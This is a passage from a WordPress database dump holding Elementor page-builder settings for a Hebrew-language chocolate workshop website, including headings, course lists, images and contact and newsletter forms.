\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61739365\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"377296c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"a673372\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"40017cec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23388368\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(314,80,'_elementor_version','0.4'),(315,80,'_elementor_template_type','post'),(316,81,'_wp_page_template','elementor_canvas'),(317,81,'_elementor_edit_mode','builder'),(318,81,'_elementor_data','[{\"id\":\"700950a2\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"20a86e96\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"62b3fe8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f67ac3a\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"1abed8db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"5569e669\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05d5. \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d4\\u05db\\u05e0\\u05d4 \\u05d4\\u05de\\u05e9\\u05d5\\u05dc\\u05d1\\u05ea, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05db\\u05e0\\u05ea\\u05dd. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3.\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4058fdb2\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"778b3676\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"37eaf375\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61dc30dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"31a67108\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3bf2db\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"5122f9c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"63f9b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61739365\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"377296c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"